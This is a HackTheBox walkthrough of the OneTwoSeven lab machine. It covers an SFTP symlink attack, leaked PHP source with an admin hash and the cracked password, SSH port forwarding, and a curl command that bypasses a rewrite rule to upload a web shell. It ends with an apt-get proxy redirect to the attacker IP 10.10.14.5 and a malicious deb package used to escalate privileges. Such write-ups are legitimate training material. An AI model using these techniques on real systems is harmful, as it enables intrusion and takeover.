HackTheBox - OneTwoSeven

Nmap scan (Basic and all port)

Always ping the machine before running the nmap scan.

All port scan discloses port 60080 to be filtered, so we will keep that in mind.

WAF/Firewall Running

Some kind of firewall shutting down the webserver after certain amount of requests. This kind of scenario happens when are sending a lot of requests at the same time. So we cannot run gobuster scan.

We can poke around the website and start with manual enumeration.

When we click on the Signup today button, we get to this page with a set of credentials.

In computing, the SSH File Transfer Protocol is a network protocol that provides file access, file transfer, and file management over any reliable data stream. It was designed by the Internet Engineering Task Force as an extension of the Secure Shell protocol version 2.0 to provide secure file transfer capabilities.

Note:
1) Admin Link disabled - http://onetwoseven.htb:60080/
2) Interesting comments found on the source page
- Only enable link if access from trusted networks admin/20190212
- Added localhost admin/20190214

So the admin access is only enabled for trusted network and in this case is localhost (127.0.0.1)

Enumerating SFTP (Secure File Transfer Protocol)

We can try to login to SSH using the given credentials.

Nope that didn't work. Let's try using SFTP command that is pre-installed in Kali.

We have this website http://onetwoseven.htb/~ots-lYmQ1YWI/ where we can upload files if we want using SFTP Server. Let's see if this works properly. I will try to upload a basic html file.

Looks like we can upload a file and that file will be served on the web-server.

But for some reason, we can't upload a php file and if we try to upload it, it gives us the following error.

SFTP Symlink attack

There was a vulnerability related to SFTP wherein we can create a symlink where we have read and write privileges. This attack is known as SFTP Symlink attack.

Read more about here . Now we can try to list the root of the system using the following command.

A symbolic link, also termed a soft link, is a special kind of file that points to another file, much like a shortcut in Windows or a Macintosh alias. Unlike a hard link, a symbolic link does not contain the data in the target file. It simply points to another entry somewhere in the file system.

symlink / root_file

We can only access the /var/www/html and /var/www/html-admin directory. So let's get all the html/php files and start analyzing it.

Code Analysis

# PHP Code for index.php
<?php if ( $_SERVER['REMOTE_ADDR'] == "127.0.0.1" || $_SERVER['REMOTE_ADDR'] == "104.24.0.54" ) { 

	 <li class="nav-item"><a id="adminlink" class="nav-link enabled" href="http://onetwoseven.htb:60080/">Admin</a></li>

      else { 

	  <li class="nav-item"><a id="adminlink" class="nav-link disabled" href="http://onetwoseven.htb:60080/">Admin</a></li>

	  } 
?>

# PHP Code for signup.php
<?php
	function username() { 
		$ip = $_SERVER['REMOTE_ADDR']; 
		return "ots-" . substr(str_replace('=','',base64_encode(substr(md5($ip),0,8))),3); 
		}
	function password() { 
		$ip = $_SERVER['REMOTE_ADDR']; 
		return substr(md5($ip),0,8); }
?>

Download the .login.php.swp and open it using vim. (vim -r login.php.swp)

#Code for login.php
<?php if ( $_SERVER['SERVER_PORT'] != 60080 ) { die(); } ?>
<?php session_start(); if (isset ($_SESSION['username'])) { header("Location: /menu.php"); } ?>
<!doctype html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <meta name="description" content="">
    <meta name="author" content="Mark Otto, Jacob Thornton, and Bootstrap contributors">
    <meta name="generator" content="Jekyll v3.8.5">
    <title>OneTwoSeven</title>

    <!-- Bootstrap core CSS -->
    <link href="/dist/css/bootstrap.min.css" rel="stylesheet" crossorigin="anonymous">

    <style>
      .bd-placeholder-img { font-size: 1.125rem; text-anchor: middle; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; user-select: none; }
      @media (min-width: 768px) { .bd-placeholder-img-lg { font-size: 3.5rem; } }
    </style>
    <!-- Custom styles for this template -->
    <link href="carousel.css" rel="stylesheet">
  </head>
  <body>
    <header>
  <nav class="navbar navbar-expand-md navbar-dark fixed-top bg-dark">
    <a class="navbar-brand" href="/login.php">OneTwoSeven - Administration Backend</a>
    <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarCollapse" aria-controls="navbarCollapse" aria-expanded="false" aria-label="Toggle navigation">
      <span class="navbar-toggler-icon"></span>
    </button>
    <div class="collapse navbar-collapse" id="navbarCollapse">
    </div>
  </nav>
</header>

<main role="main">

  <div id="myCarousel" class="carousel slide" data-ride="carousel">
    <ol class="carousel-indicators">
      <li data-target="#myCarousel" data-slide-to="0" class="active"></li>
    </ol>
    <div class="carousel-inner">
      <div class="carousel-item active">
        <img src="dist/img/ai-codes-coding-97077.jpg">
        <div class="container">
          <div class="carousel-caption text-left">
            <h1>OneTwoSeven Administration</h1>
            <p>Administration backend. For administrators only.</p>
          </div>
        </div>
      </div>
    </div>
    <a class="carousel-control-prev" href="#myCarousel" role="button" data-slide="prev">
      <span class="carousel-control-prev-icon" aria-hidden="true"></span>
      <span class="sr-only">Previous</span>
    </a>
    <a class="carousel-control-next" href="#myCarousel" role="button" data-slide="next">
      <span class="carousel-control-next-icon" aria-hidden="true"></span>
      <span class="sr-only">Next</span>
    </a>
  </div>


  <!-- Marketing messaging and featurettes
  ================================================== -->
  <!-- Wrap the rest of the page in another container to center all the content. -->

  <div class="container marketing">

    <!-- START THE FEATURETTES -->

    <div class="row featurette">
      <div class="col-md-12">
        <h2 class="featurette-heading">Login to the kingdom.<span class="text-muted"> Up up and away!</span></h2>
          <?php
            $msg = '';
            
            if (isset($_POST['login']) && !empty($_POST['username']) && !empty($_POST['password'])) {
	      if ($_POST['username'] == 'ots-admin' && hash('sha256',$_POST['password']) == '11c5a42c9d74d5442ef3cc835bda1b3e7cc7f494e704a10d0de426b2fbe5cbd8') {
                  $_SESSION['username'] = 'ots-admin';
		  header("Location: /menu.php");
              } else {
                  $msg = 'Wrong username or password.';
              }
            }
         ?>
      </div> <!-- /container -->
      
      <div class = "container">
      
         <form action="/login.php" method="post">
            <h4 class = "form-signin-heading"><font size="-1" color="red"><?php echo $msg; ?></font></h4>
	    <table>
              <tr><td><b>Username:</b></td><td><input type="text" name="username" size="40" required autofocus></td></tr>
              <tr><td><b>Password:</b></td><td><input type="password" name="password" size="40" required></td></tr>
              <tr><td colspan="2"><center><button type="submit" name="login">Login</button></center></td></tr>
            </table>
         </form>
	     </div>
    </div>

    <hr class="featurette-divider">

    <!-- /END THE FEATURETTES -->

  </div><!-- /.container -->


  <!-- FOOTER -->
  <footer class="container">
    <p class="float-right"><a href="#">Back to top</a></p>
    <p>&copy; 2019 OneTwoSeven, Dec. &middot; <a href="#">Privacy</a> &middot; <a href="#">Terms</a></p>
  </footer>
</main>
<script src="https://code.jquery.com/jquery-3.3.1.slim.min.js" integrity="sha384-q8i/X+965DzO0rT7abK41JStQIAqVgRVzpbzo5smXKp4YfRvH+8abtTE1Pi6jizo" crossorigin="anonymous"></script>
      <script>window.jQuery || document.write('<script src="/docs/4.3/assets/js/vendor/jquery-slim.min.js"><\/script>')</script><script src="dist/js/bootstrap.bundle.min.js" crossorigin="anonymous"></script></body>
</html>

SSH Port Forwarding

This login.php file belongs to the Administrator back-end which is running on port 60080 on localhost. So we need to get access to that. We can use SSH Port forwarding option.

ssh -L 60080:127.0.0.1:60080 -N ots-lYmQ1YWI@10.10.10.133

Hash Cracking for ots-admin

Credentials for ots-admin : Homesweethome1

Bypassing Rewrite Engines Rules

#Code for addon manager
<?php session_start(); if (!isset ($_SESSION['username'])) { header("Location: /login.php"); }; if ( strpos($_SERVER['REQUEST_URI'], '/addons/') !== false ) { die(); };
# OneTwoSeven Admin Plugin
# OTS Addon Manager
switch (true) {
	# Upload addon to addons folder.
	case preg_match('/\/addon-upload.php/',$_SERVER['REQUEST_URI']):
		if(isset($_FILES['addon'])){
			$errors= array();
			$file_name = basename($_FILES['addon']['name']);
			$file_size =$_FILES['addon']['size'];
			$file_tmp =$_FILES['addon']['tmp_name'];

			if($file_size > 20000){
				$errors[]='Module too big for addon manager. Please upload manually.';
			}

			if(empty($errors)==true) {
				move_uploaded_file($file_tmp,$file_name);
				header("Location: /menu.php");
				header("Content-Type: text/plain");
				echo "File uploaded successfull.y";
			} else {
				header("Location: /menu.php");
				header("Content-Type: text/plain");
				echo "Error uploading the file: ";
				print_r($errors);
			}
		}
		break;
	# Download addon from addons folder.
	case preg_match('/\/addon-download.php/',$_SERVER['REQUEST_URI']):
		if ($_GET['addon']) {
			$addon_file = basename($_GET['addon']);
			if ( file_exists($addon_file) ) {
				header("Content-Disposition: attachment; filename=$addon_file");
				header("Content-Type: text/plain");
				readfile($addon_file);
			} else {
				header($_SERVER["SERVER_PROTOCOL"]." 404 Not Found", true, 404);
				die();
			}
		}
		break;
	default:
		echo "The addon manager must not be executed directly but only via<br>";
		echo "the provided RewriteRules:<br><hr>";
		echo "RewriteEngine On<br>";
		echo "RewriteRule ^addon-upload.php   addons/ots-man-addon.php [L]<br>";
		echo "RewriteRule ^addon-download.php addons/ots-man-addon.php [L]<br><hr>";
		echo "By commenting individual RewriteRules you can disable single<br>";
		echo "features (i.e. for security reasons)<br><br>";
		echo "<font size='-2'>Please note: Disabling a feature through htaccess leads to 404 errors for now.</font>";
		break;
}
?>

So if we try to access addon-upload.php, it will overwrite itself with addons/ots-man-addon.php. And same goes for addon-download.php. We can bypass this filter by using the following case.

/addon-download.php&/addon-upload.php

curl -X POST "http://localhost:60080/addon-download.php&/addon-upload.php" -F 'addon=@shell.php'

Python script to get a reverse shell

Configuring Burp Proxy for MITM Attack

We can run /usr/bin/apt-get update as well as /usr/bin/apt-get upgrade as the superuser. Interesting thing to note over here is we can use any kind of HTTP proxy if we want. That means we can assume this to be a MITM Attack.

export http_proxy="http://10.10.14.5:1337"

So when we will run apt-get update, the request will go over to http://10.10.14.5:1337/ i.e Burp Proxy and then the proxy will redirect the request to our Python HTTP Server listening on port 8000.

So when we run sudo apt-get update, we get a following set of requests on our web server.

Creating Malicious Deb package

References: http://packages.devuan.org/devuan

Just go to http://packages.devuan.org/devuan/dists/ascii/main/binary-amd64/ and download the Packages.gz file.

We will edit the file according to our need. (Installing an upgrade for the package telnet)

Size and SHA256 should be edited after creating the malicious deb file.

To create a malicious package, we can take reference from https://github.com/mthbernardes/Derbie.

First the directory should be telnet, then it should contain another directory named DEBIAN and the DEBIAN directory should contain two files. control and postinst

control is almost as same as the Packages file and postinst will contain our malicious code.

Now to create the deb file, run the following command in the terminal.